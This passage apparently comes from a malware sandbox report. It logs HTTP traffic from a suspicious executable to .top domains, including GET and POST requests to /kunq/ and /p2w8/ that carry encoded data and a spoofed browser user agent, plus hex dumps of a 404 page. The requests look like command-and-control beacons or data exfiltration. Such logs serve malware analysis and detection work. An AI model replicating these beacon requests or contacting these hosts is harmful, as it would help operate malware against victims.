                                        Data Ascii: mvjDMBx8=T0BhC6K0jgYse8chbyyONQ0MQ4oA0/1tlw+AwrxkyVHky7VshZqspQ//BoJVAF2PtX9XbfuFwEmp1ozGz3BgaibKPhT5AiN/xruo1ZccvOpeMy7SlG4mYP7S0mCCe509jTrFJb/GmA2zZAeFjuCwOULjlqrYH541ArZ8yiuhL4I0aINSwf7t5imVHpyqdz1P23J5XuDTzbVrwnPt9omV7oj4B7V9Pi9SqnYe9f0Wgs0iTrDjcvOWme800Ni9yWysxG8Z5Su5cSagBUFPh2nzUPUfgBcAIeeGjZNp6hFKDtW//U3odd2GyAgFkOQcF/SAJxGcFZT5SHanbxPI6d6P6rUdCxnyrRNFXMs7fx8FhUOyuL0xdo6VJVpID4rmAXf5HuZbj26J2DM2r44DPQwLutLCcuQL/dsPqXgYpMGz8Ycmli24mNUzogIHWLuPrhxaGVw+ITwuxhPnA6ia96v76wWrgYSHQnrOXgOyQEiDTZL3w/rP5Zwu3dUSf8j9HESdJVgXf2RUiJt6z5sTxob2D9eCq1BXiLDAiXrHWPeM1UvNDzqK9xLjLUgMBPahAvTqkvKUOuWdWFDqDPdH/RM4yNY/UaWBdn5/SiShJZCmYb676Cg1YhxLxLK/YFL6BZZYPqwppF9HxSzqfiFH7tXWlY7bHPawH333MBdea8K2Yo3omXmRWloKn+yU4MYH9SJEcOYlvFlLUvn7VSWzn8xObxCl6w+YLYCkyWPPzcFVX4dic2GJ8tDRYvJJaPjrrjOYoOubX872wz9rqq8nEDW4vVlOlFEI7IPvoXB1YOmLs3o2CGS4MY/txvCOTvPlQHspj12OXt0BVxEvEzOZdyfBbrrasGoXUEGFv/gynuu1nAeGWJlAfa2d6r2Fo3PtgKwulcN+1sBPeSFJ4Vv01zR7Sh7rWjy7XHGRtjlsZLw5wbx6O+MJWTV7fBq/AwBXmzt7KVYRopaG8We7lTYZJ207cB9fCcwD/fpKbI0dQBNK0rr [TRUNCATED]
                                        Aug 27, 2024 08:43:49.164372921 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:43:49 GMT
                                        Server: Apache
                                        Content-Length: 18121
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                        Aug 27, 2024 08:43:49.164386034 CEST224INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                                        Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2
                                        Aug 27, 2024 08:43:49.164406061 CEST1236INData Raw: 22 20 64 3d 22 4d 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 31 30 20 33 30 37 2e 36 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 32 30 20 33 30 37 2e
                                        Data Ascii: " d="M19.8 282.4h-3L10 307.6h3z"/> <path class="st2" d="M29.8 282.4h-3L20 307.6h3z"/> <path class="st2" d="M39.8 282.4h-3L30 307.6h3z"/> <path class="st2" d="M49.8 282.4h-3L40 307.6h3z"/> <path class="st2" d="M59.8 282.4h-3L50
                                        Aug 27, 2024 08:43:49.164423943 CEST1236INData Raw: 22 20 64 3d 22 4d 32 33 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 34 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38
                                        Data Ascii: " d="M239.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M249.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M259.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M269.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M279.8 282
                                        Aug 27, 2024 08:43:49.164437056 CEST1236INData Raw: 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34
                                        Data Ascii: <path class="st2" d="M459.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M469.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M479.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M489.8 282.4h-3l-6.8 25.2h3z"/> <path class="
                                        Aug 27, 2024 08:43:49.164449930 CEST672INData Raw: 73 74 32 22 20 64 3d 22 4d 38 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 32 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20
                                        Data Ascii: st2" d="M830 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M820 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M810 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M800 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M790 282.4h-3l-
                                        Aug 27, 2024 08:43:49.164463043 CEST1236INData Raw: 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20
                                        Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-3l-6.8 25.2h3z"
                                        Aug 27, 2024 08:43:49.164474964 CEST224INData Raw: 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 32 30 2e 32 20 32 38 32 2e
                                        Data Ascii: ="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/>
                                        Aug 27, 2024 08:43:49.164496899 CEST1236INData Raw: 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22
                                        Data Ascii: <path class="st2" d="M-390.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-380.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8 25.2h3z"/>
                                        Aug 27, 2024 08:43:49.164511919 CEST224INData Raw: 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 38 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e
                                        Data Ascii: 2.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-180.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-170.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/> <path class="st
                                        Aug 27, 2024 08:43:49.169431925 CEST1236INData Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                                        Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        32192.168.2.651229162.0.239.141805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:51.077570915 CEST581OUTGET /kunq/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=e2pBBNKfhlcNZug/MlikLwl2FbwO8O5PulKDyYpFlUnCxZtvvcHmj1jMPp0LVU20n2VhUZuzz0qV7Mfxt0dNEDuQKyzOHg8PupeV8YN8l6deJxHpy2VUY+/g7EuAZK4kmgb6d+0= HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.stolex.top
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:43:51.707773924 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:43:51 GMT
                                        Server: Apache
                                        Content-Length: 18121
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                        Aug 27, 2024 08:43:51.707797050 CEST224INData Raw: 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20
                                        Data Ascii: .2s54.7-28 117.5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <
                                        Aug 27, 2024 08:43:51.707809925 CEST1236INData Raw: 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 31 30 20 33 30 37 2e 36 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 39 2e 38 20 32
                                        Data Ascii: path class="st2" d="M19.8 282.4h-3L10 307.6h3z"/> <path class="st2" d="M29.8 282.4h-3L20 307.6h3z"/> <path class="st2" d="M39.8 282.4h-3L30 307.6h3z"/> <path class="st2" d="M49.8 282.4h-3L40 307.6h3z"/> <path class="st2" d="M59
                                        Aug 27, 2024 08:43:51.707822084 CEST1236INData Raw: 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 33 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 34 39 2e
                                        Data Ascii: path class="st2" d="M239.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M249.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M259.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M269.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2
                                        Aug 27, 2024 08:43:51.707838058 CEST1236INData Raw: 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c
                                        Data Ascii: 8 25.2h3z"/> <path class="st2" d="M459.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M469.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M479.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M489.8 282.4h-3l-6.8 25.2h3z"/>
                                        Aug 27, 2024 08:43:51.707850933 CEST672INData Raw: 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 32 30
                                        Data Ascii: <path class="st2" d="M830 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M820 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M810 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M800 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="
                                        Aug 27, 2024 08:43:51.707863092 CEST1236INData Raw: 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36
                                        Data Ascii: s="st2" d="M710 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-
                                        Aug 27, 2024 08:43:51.707875967 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20
                                        Data Ascii: <path class="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/>
                                        Aug 27, 2024 08:43:51.707890987 CEST448INData Raw: 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 32 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a
                                        Data Ascii: .4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-200.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-190.2 282.4h
                                        Aug 27, 2024 08:43:51.707987070 CEST1236INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d
                                        Data Ascii: <path class="st2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <pa
                                        Aug 27, 2024 08:43:51.713010073 CEST1236INData Raw: 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38
                                        Data Ascii: th class="st2" d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        33192.168.2.65123013.248.169.48805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:57.018524885 CEST852OUTPOST /p2w8/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.healthsolutions.top
                                        Origin: http://www.healthsolutions.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.healthsolutions.top/p2w8/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 35 4c 67 5a 71 30 47 43 6a 7a 47 72 47 4e 38 77 4e 4d 68 6d 76 6d 7a 59 4c 6a 39 56 63 4a 30 65 73 4b 74 33 6c 4b 6c 75 77 49 56 68 74 79 58 57 32 6b 35 6d 67 32 45 43 6f 6d 72 4f 63 70 32 45 6c 4b 6c 69 51 31 4d 4f 59 31 69 70 4b 68 34 6b 64 43 56 53 35 6e 33 4d 77 73 49 73 41 44 2b 4b 45 64 32 35 6e 2b 69 43 6a 68 58 6f 52 59 35 32 32 42 4e 59 70 56 76 62 61 7a 4f 4c 51 70 6f 55 31 37 4c 61 63 72 68 72 68 49 35 39 61 6d 5a 44 49 30 4c 67 78 45 55 43 71 39 46 53 38 2b 36 63 50 2b 78 4e 73 66 2f 58 67 45 46 47 31 39 4b 42 7a 42 69 6a 58 66 68 41 59 43 47 56 36 32 57 74 57 6d 35 76 49 46 43 4b 38 76 78 59
                                        Data Ascii: mvjDMBx8=5LgZq0GCjzGrGN8wNMhmvmzYLj9VcJ0esKt3lKluwIVhtyXW2k5mg2EComrOcp2ElKliQ1MOY1ipKh4kdCVS5n3MwsIsAD+KEd25n+iCjhXoRY522BNYpVvbazOLQpoU17LacrhrhI59amZDI0LgxEUCq9FS8+6cP+xNsf/XgEFG19KBzBijXfhAYCGV62WtWm5vIFCK8vxY


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        34192.168.2.65123113.248.169.48805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:59.567925930 CEST876OUTPOST /p2w8/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.healthsolutions.top
                                        Origin: http://www.healthsolutions.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.healthsolutions.top/p2w8/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 35 4c 67 5a 71 30 47 43 6a 7a 47 72 45 73 4d 77 4d 72 39 6d 2b 57 7a 66 4f 6a 39 56 56 70 31 58 73 4b 70 33 6c 49 49 7a 78 2b 74 68 74 54 6e 57 33 67 74 6d 6e 32 45 43 6e 47 71 45 59 70 32 50 6c 4b 70 71 51 77 30 4f 59 31 6d 70 4b 6b 63 6b 64 52 4e 52 36 58 33 4b 35 4d 49 75 59 6a 2b 4b 45 64 32 35 6e 39 65 6f 6a 6c 37 6f 53 72 68 32 33 6b 35 62 32 6c 76 59 4b 44 4f 4c 55 70 6f 50 31 37 4b 2f 63 71 38 45 68 4c 42 39 61 6d 70 44 50 6c 4c 6a 6f 30 55 59 6e 64 45 4b 37 38 71 59 57 2b 67 72 79 2b 71 78 34 54 42 54 39 72 4c 62 76 79 69 41 46 50 42 43 59 41 65 6e 36 57 57 48 55 6d 42 76 61 53 4f 74 7a 62 55 37 77 4f 69 38 6c 31 66 2f 64 32 61 70 7a 57 5a 6a 41 31 58 2b 39 77 3d 3d
                                        Data Ascii: mvjDMBx8=5LgZq0GCjzGrEsMwMr9m+WzfOj9VVp1XsKp3lIIzx+thtTnW3gtmn2ECnGqEYp2PlKpqQw0OY1mpKkckdRNR6X3K5MIuYj+KEd25n9eojl7oSrh23k5b2lvYKDOLUpoP17K/cq8EhLB9ampDPlLjo0UYndEK78qYW+gry+qx4TBT9rLbvyiAFPBCYAen6WWHUmBvaSOtzbU7wOi8l1f/d2apzWZjA1X+9w==


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        35192.168.2.65123213.248.169.48805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:02.115555048 CEST1889OUTPOST /p2w8/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.healthsolutions.top
                                        Origin: http://www.healthsolutions.top
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
